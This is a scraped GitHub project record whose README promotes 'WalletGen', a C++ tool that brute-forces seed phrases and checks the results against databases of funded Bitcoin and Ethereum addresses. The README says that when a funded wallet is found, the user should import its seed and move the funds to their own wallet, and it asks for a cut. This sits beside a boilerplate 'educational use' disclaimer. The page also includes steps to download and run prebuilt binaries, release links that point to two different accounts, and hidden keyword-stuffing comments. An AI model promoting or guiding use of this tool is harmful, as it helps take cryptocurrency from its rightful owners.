[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"project-83275":3},{"id":4,"name":5,"fullName":6,"owner":7,"repo":5,"description":8,"homepage":9,"htmlUrl":10,"language":11,"languages":10,"totalLinesOfCode":10,"stars":12,"forks":13,"watchers":14,"openIssues":15,"contributorsCount":15,"subscribersCount":15,"size":15,"stars1d":16,"stars7d":17,"stars30d":17,"stars90d":15,"forks30d":15,"starsTrendScore":18,"compositeScore":19,"rankGlobal":10,"rankLanguage":10,"license":20,"archived":21,"fork":21,"defaultBranch":22,"hasWiki":23,"hasPages":21,"topics":24,"createdAt":10,"pushedAt":10,"updatedAt":45,"readmeContent":46,"aiSummary":10,"trendingCount":15,"starSnapshotCount":15,"syncStatus":47,"lastSyncTime":48,"discoverSource":49},83275,"seed-phrase-generator","tony-cote\u002Fseed-phrase-generator","tony-cote","WalletGen - Seed phrase generator and finder for Bitcoin, EVM (Ethereum) wallets. Recovery your lost BTC or ETH wallet via private key \u002F seed phrase generation.","",null,"C++",349,58,10,0,8,203,53,5.31,"MIT License",false,"main",true,[25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44],"bitcoin","bitcoin-private-key-finder","bitcoin-wallet","btc-wallet","ethereum-bruteforce","ethereum-tools","finder-bitcoin","finder-crypto","lost-bitcoins","lost-bitcoins-wallet","lost-wallets","mnemonic-seed-checker","seed-phrases-finder","seed-phrases-generate","seed-phrases-generator","seed-recovery-tool","seedphrase-checker","seedphrase-generator","walletgen","wallets-finder","2026-06-12 02:04:32","# Seed Phrase Generator (WalletGen) – Crypto Wallet Generator & Balance Finder for Lost Bitcoin (BTC), Ethereum (ETH), BNB, Polygon (MATIC) and EVM Chains & Bitcoin Wallet Recover\r\n\r\n**WalletGen** is an open-source, ultra-fast **crypto wallet generator** and **seed phrase brute force tool**. It helps you find and recovery lost or inactive **Bitcoin (BTC)**, **Ethereum (ETH)**, **BNB**, **Polygon (MATIC)**, and other **EVM-compatible wallets** with real-time balance checking and high-performance C++ engine.\r\n\r\n\u003C!--\r\nMeta description:\r\nWalletGen is a high-speed, open-source crypto wallet generator and balance finder for Bitcoin, Ethereum, and other EVM-compatible blockchains. It allows brute-force seed phrase testing, wallet generation, and recovery of lost crypto wallets using databases or real-time balance checks.\r\n-->\r\n\r\n## Quick Navigation\r\n- [Download WalletGen](#how-to-start)\r\n- [Database Download](#download-and-use-database-for-more-speed)\r\n- [How It Works](#how-it-works)\r\n- [Why WalletGen](#why-walletgen)\r\n- [Features](#features)\r\n- [The Program Found a Wallet - What Next?](#the-program-found-a-wallet--whats-next)\r\n- [Recovery Your Bitcoin Wallet](#recovery-your-bitcoin-wallet)\r\n- [My Finds](#my-finds)\r\n- [FAQ](#-frequently-asked-questions-faq)\r\n- [Build Instructions](#building-the-project)\r\n- [Donate](#donate)\r\n\r\n[![platform](https:\u002F\u002Fimg.shields.io\u002Fbadge\u002Fplatform-Windows%20%7C%20MacOS%20%7C%20Linux%20%7C%20Android-blue)](https:\u002F\u002Fgithub.com\u002Ftony-dev1\u002Fwallets-finder\u002Freleases\u002Ftag\u002Fwalletgen)\r\n![build](https:\u002F\u002Fimg.shields.io\u002Fbadge\u002Fbuild-passing-brightgreen)\r\n[![x](https:\u002F\u002Fimg.shields.io\u002Fbadge\u002F@tonydevbtc-black.svg?logo=x)](https:\u002F\u002Fx.com\u002Ftonydevbtc)\r\n\r\n\u003Cp align=\"center\">\r\n    \u003Cimg width=\"1000\" alt=\"WalletGen wallet generator demo\" title=\"WalletGen wallet generator\" height=\"460\" src=\"\u002Fassets\u002Fwalletgen.webp\" \u002F>\r\n\u003C\u002Fp>\r\n\r\n\u003Cp align=\"center\">\r\n    \u003Cimg width=\"1000\" alt=\"WalletGen MacOS wallet generator demo\" title=\"WalletGen wallet generator\" height=\"460\" src=\"\u002Fassets\u002Fwalletgen_macos1.webp\" \u002F>\r\n\u003C\u002Fp>\r\n\r\n⚠️ **Disclaimer**: WalletGen is a research and educational tool. It is not intended for unauthorized access or malicious activity. Use it responsibly and only with wallets you own or have permission to access.\r\n\r\n## How It Works\r\n\r\nWalletGen generates wallets using [BIP39](https:\u002F\u002Fgithub.com\u002Fbitcoin\u002Fbips\u002Fblob\u002Fmaster\u002Fbip-0039.mediawiki), [BIP44](https:\u002F\u002Fgithub.com\u002Fbitcoin\u002Fbips\u002Fblob\u002Fmaster\u002Fbip-0044.mediawiki), and [Bech32](https:\u002F\u002Fen.bitcoin.it\u002Fwiki\u002FBech32) for Bitcoin, and [Keccak256](https:\u002F\u002Femn178.github.io\u002Fonline-tools\u002Fkeccak_256.html) hashing for EVM-based chains like Ethereum.\r\n\r\nThe software compares generated addresses against known address databases or checks balances in real-time via public blockchain explorers. \r\n\r\nWallet Gen is built in C++ and is open-source, allowing anyone to access and modify the code. Compared to Python-based wallet generators, Wallet Gen boasts significantly higher wallet generation speeds, with performance primarily relying on your CPU & GPU.\r\n\r\n##  Why WalletGen?\r\n\r\nUnlike Python-based brute force tools, **WalletGen** is written in C++ and optimized for multi-threaded CPU and GPU usage, delivering up to **10x faster** performance. Whether you’re exploring lost wallets, verifying private key space, or recovering your own wallet, WalletGen gives you the power to do it efficiently and securely.\r\n\r\n## Features\r\n\r\n- **Generation of cryptocurrency wallets**: Wallet Gen supports creating single wallets for Bitcoin, Ethereum, BNB, MATIC and other cryptocurrencies.\r\n- **Search for wallets with balance**: Using bruteforce techniques, Wallet Gen allows you to search for existing wallets with balances in both the Bitcoin network and EVMs.\r\n- **Support for various algorithms**: Keccak256 algorithm for EVM wallets and BIP39, BIP44, Bech32 algorithm for Bitcoin are used for wallet generation.\r\n- **Using a database to speed up searches**: Download and use databases to search for balance wallets, speeding up the process tenfold.\r\n- **High speed of operation**: Wallet Gen utilizes the power of the CPU and GPU to achieve the best performance.\r\n- **Recovery your Bitcoin wallet**: WalletGen allows you to recover your bitcoin wallet by seed phrase (mnemonic phrase).\r\n\r\n## Supported Blockchains\r\n\r\n- Bitcoin (BTC)\r\n- Ethereum (ETH)\r\n- Binance Smart Chain (BNB)\r\n- Any EVM-compatible chain\r\n\r\n# Demo\r\n\r\n\u003Cp align=\"center\">\r\n    \u003Cimg width=\"1000\" height=\"460\" alt=\"WalletGen search lost bitcoin wallets on Windows Demo\" title=\"WalletGen search lost bitcoin wallets on Windows\" src=\"\u002Fassets\u002Fwalletgen-demo.gif\" \u002F>\r\n\u003C\u002Fp>\r\n\r\n\u003Cp align=\"center\">\r\n    \u003Cimg width=\"1000\" height=\"460\" alt=\"WalletGen search lost bitcoin wallets on MacOS Demo\" title=\"WalletGen search lost bitcoin wallets on MacOS\" src=\"\u002Fassets\u002Fwalletgen_macos2.gif\" \u002F>\r\n\u003C\u002Fp>\r\n\r\n\u003Cp align=\"center\">\r\n    \u003Cimg width=\"1000\" alt=\"WalletGen MacOS wallet generator demo\" title=\"WalletGen wallet generator\" height=\"460\" src=\"\u002Fassets\u002Fwalletgen_macos2.webp\" \u002F>\r\n\u003C\u002Fp>\r\n\r\n\r\n\u003Cp align=\"center\">\r\n    \u003Cimg width=\"1000\" height=\"460\" alt=\"WalletGen search lost bitcoin wallets on Linux Demo\" title=\"WalletGen search lost bitcoin wallets on Linux\" src=\"\u002Fassets\u002Fwalletgen_linux1.webp\" \u002F>\r\n\u003C\u002Fp>\r\n\r\n# How to start\r\n\r\n## Windows \r\n- Download [WalletGen.zip](https:\u002F\u002Fgithub.com\u002Ftony-cote\u002Fwalletgen\u002Freleases\u002Ftag\u002Frelease)\r\n- Unpack anywhere\r\n- Run `WalletGen.exe`\r\n\r\n## MacOS\r\n\r\n- Download [WalletGen.dmg](https:\u002F\u002Fgithub.com\u002Ftony-cote\u002Fwalletgen\u002Freleases\u002Ftag\u002Frelease)\r\n\r\n## Linux (x86-64bit)\r\n```bash\r\nwget https:\u002F\u002Fgithub.com\u002Ftony-cote\u002Fwalletgen\u002Freleases\u002Fdownload\u002Frelease\u002Fwalletgen-linux-x64.tar.gz\r\ntar -xzf  walletgen-linux-x64.tar.gz\r\ncd walletgen\r\n.\u002Fwalletgen\r\n```\r\n## Android (Beta)\r\n- Download [walletgen-beta.apk](https:\u002F\u002Fgithub.com\u002Ftony-cote\u002Fwalletgen\u002Freleases\u002Ftag\u002Frelease)\r\n\r\n### Download and Use Database (for more speed)\r\n| Database                                                     | Download link                                |  File Size                             | Number of Addresses  |\r\n|---------------------------------------------------------|------------------------------------------------|------------------------------------|----------------------------------|\r\n| BTC Database                                            | &nbsp;&nbsp;&nbsp;&nbsp;[btc_database.txt](https:\u002F\u002Fgithub.com\u002Ftony-cote\u002Fwalletgen\u002Freleases\u002Ftag\u002Fdatabase)  | 1.03 GB | &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;23 428 179\r\n| EVM Database                                            | &nbsp;&nbsp;&nbsp;&nbsp;[evm_database.txt](https:\u002F\u002Fgithub.com\u002Ftony-cote\u002Fwalletgen\u002Freleases\u002Ftag\u002Fdatabase)  | 1.02 GB | &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;25 999 700\r\n\r\n\r\n## How to Search for Lost Bitcoin & Ethereum Wallets with Balance\r\n\r\n**Wallet Gen** allows you to search using brute-force method for two types of crypto wallets with an existing balance.\r\n\r\n### For Bitcoin (BTC) wallets:\r\n\r\n* Press key 3 in the menu or run start_search_btc.bat to search Bitcoin wallets through the internet. This method may take longer, as it checks wallet balances in real-time via blockchain explorers.\r\n* Press key 6 to search Bitcoin wallets using the database. This method is faster because it compares generated wallets against a pre-built database of known addresses with balances.\r\n\r\n### For EVM wallets (Ethereum, BNB, MATIC, etc.):\r\n\r\n* Press key 5 or run start_search_evm.bat to search EVM wallets through the internet. This method checks for wallets with balance in real-time through blockchain explorers.\r\n* Press key 6 to search EVM wallets using the database. This method is faster since it compares generated wallets against the known database of addresses with balance.\r\n\r\n### Speed Considerations:\r\n\r\n* The speed of the search depends heavily on your hardware, especially the graphics card (GPU). To speed up the process and increase your chances of finding a wallet with a balance, you can run multiple instances of the program (1 to 4), depending on your system's performance\r\n\r\nBy using the database, you can significantly improve the efficiency of your search, as it eliminates the need to query the blockchain for every wallet generated\r\n\r\n## The Program Found a Wallet — What’s Next?\r\nWhen the program finds a wallet with a balance, it will:\r\n* **Stop** immediately\r\n* **Display** the wallet details in the console\r\n* **Save** this data in the ``found_wallets.txt`` file\r\n\r\n### How to Access the Funds?\r\n1. Import the **mnemonic seed phrase** from the found wallet into any compatible crypto wallet (such as Metamask, Trust Wallet, or Electrum).\r\n2. Once restored, you’ll be able to transfer the funds to your own wallet.\r\n   \r\n>  If the find is successful, be sure to share a small portion of the balance you find with me! Thank you!\r\n\r\n## Recovery Your Bitcoin Wallet\r\n\r\nWalletGen allows you to recover your bitcoin wallet by seed phrase (mnemonic phrase). The program supports entering a complete seed phrase, as well as searching for missing words using special characters.\r\n\r\n### Process Description\r\n\r\n#### Search for missing words:\r\n\r\nIf your seed phrase is missing some words or you are unsure, replace those words with an *. WalletGen will search through all possible variations in the places of * to find the correct seed phrase and restore the associated wallet balance.\r\n\r\n#### Entering a complete seed-phrase:\r\n\r\nIf you have a full 12-word seed, simply enter it in full with a space. WalletGen will generate all address types (Legacy, SegWit, P2SH) and check their balances.\r\n\r\n![recovery](\u002Fassets\u002Frecovery.webp)\r\n\r\n### Important recommendations\r\n\r\n* Seed-phrase must contain exactly 12 words.\r\n* Use only the * symbol to search for missing words.\r\n* Searching for missing words may take considerable time, especially if several words are missing.\r\n* If the wallet with balance is successfully recovered, the program will automatically stop and save the found data.\r\n\r\n## My Finds\r\n\r\n![mywallet](\u002Fassets\u002Fwallet.png)\r\n\r\n\r\n## Building the Project\r\n\r\n1. Open the project file (`CryptoWalletGen.sln`) in Visual Studio or any other compatible C++ compiler.\r\n2. Install the necessary dependencies and build the project.\r\n\r\n```cmd\r\n> git clone https:\u002F\u002Fgithub.com\u002Fmicrosoft\u002Fvcpkg\r\n> .\\vcpkg\\bootstrap-vcpkg.bat\r\n> .\\vcpkg\\vcpkg integrate install\r\n> .\\vcpkg\\vcpkg install openssl:x64-windows\r\n```\r\n\r\n3. Start building the project.\r\n\r\n## 🔍 Frequently Asked Questions (FAQ)\r\n\r\n### ❓ Where can I download WalletGen?\r\nYou can download the WalletGen given on the [page in the release](https:\u002F\u002Fgithub.com\u002Ftony-dev1\u002Fcrypto-wallets-finder\u002Freleases\u002Ftag\u002Fwalletgen).\r\n\r\n### ❓ Where can I download a database of known addresses with balance?\r\nYou can download the current database given on the [page in the release](https:\u002F\u002Fgithub.com\u002Ftony-dev1\u002Fcrypto-wallets-finder\u002Freleases\u002Ftag\u002Fdatabase).\r\n\r\n### ❓ Can WalletGen help me recover a lost Bitcoin wallet?\r\nYes. WalletGen uses brute-force seed generation and a known-address database to help users potentially **recover lost Bitcoin wallets**.\r\n\r\n### ❓ Is WalletGen a seed phrase generator?\r\nYes. WalletGen can generate **BIP39 seed phrases** and derive wallets for Bitcoin, Ethereum, and other EVM chains.\r\n\r\n### ❓ Do I need the internet to search through the database?\r\nNo. Searching through the database does not require an internet connection, as the wallet balance is already known.\r\n\r\n### ❓ Can I find Ethereum wallets with balance?\r\nYes. WalletGen supports scanning for **Ethereum wallets with balance** using brute-force and a database of known addresses.\r\n\r\n### ❓ Is WalletGen legal?\r\nWalletGen is intended for **educational and research purposes only**. It should only be used on wallets you own or have permission to access.\r\n\r\n## Todo\r\n1. Search for missing words in a seed phrase. - **Done!**\r\n\r\n## Contribute\r\n\r\nContributions are welcome! If you have ideas, bug reports, or want to contribute to the codebase, feel free to submit a pull request.\r\n\r\n## Donate\r\n\r\nI encourage you, when you find a wallet with a balance, to send me a small portion as a thank you. This motivates me to keep working on the program, keep it going, and make it better!\r\n\r\n**BTC:** bc1qeyrshy5ntsguwxe9m8tp2x2yqhddz7ymkj44h9\r\n\r\n**ETH:** 0x76c2E75B92Eb340f01B378e332FC7d8954893693\r\n\r\n## Credits\r\nThis project uses code from the [Trezor project](https:\u002F\u002Fgithub.com\u002Ftrezor\u002Ftrezor-crypto). The code is licensed under the MIT License.\r\n\r\n## License\r\nThis project is licensed under the [MIT License](\u002FLICENSE)\r\n\r\n\u003C!--\r\n## Keywords\r\n'bitcoin', 'ethereum', 'crypto', 'cryptocurrency', 'crypto seed phrase mining', 'crypto bruteforce', 'bitcoin bruteforce', 'ethereum bruteforce', 'crypto finder', 'lost bitcoin', 'brute force wallet', 'crypto brute foce', 'crypto bruteforce', 'crypto bruteforce wallet', 'crypto bruteforce key', 'crypto wallet', 'crypto wallet recovery', 'crypto wallet seed generator', 'crypto wallet seed phrase', 'crypto wallet tools', 'wallet finder crypto', 'wallet recovery seeds', 'wallet recovery tools', 'seed phrase', 'seed phrase generator', 'bip39 wallet', 'trezor', 'walletgen', 'crypto mining', 'mnemonic generator', 'crypto recovery', 'recovery crypto', 'bitcoin wallet', 'ethereum wallet', 'seed phrase finder', 'seed phrase wallet', 'seed phrase generator with balance', 'seed phrase balance checker', 'seed phrase trust wallet', 'seed phrase generator and checker', 'seed phrase storage', 'seed phrase word list github', 'bitcoin explorer', 'bitcoin core', 'bitcoin mining', 'ethereum mining', 'lost bitcoin wallet list', 'lost bitcoin wallet finder', 'lost bitcoin wallets', 'lost bitcoin password', 'lost bitcoin addresses', 'lost btc', 'lost bitcoins', 'lost ethereum', 'lost eth', 'crypto mining app', 'crypto mining software', 'mnemonic phrase', 'mnemonic', 'mnemonic phrase generator', 'mnemonic phrase checker', 'mnemonic phrase lost', 'mnemonic phrase to private key', 'mnemonic phrase wallet', 'private key finder', 'private key bitcoin', 'private keys' 'database', 'private key metamask', 'private key to seed phrase', 'private key', 'private key ethereum', 'private key wallet', 'crypto address check', 'brute crypto mining', 'brute crypto'.\r\n-->\r\n",2,"2026-06-11 04:10:47","CREATED_QUERY"]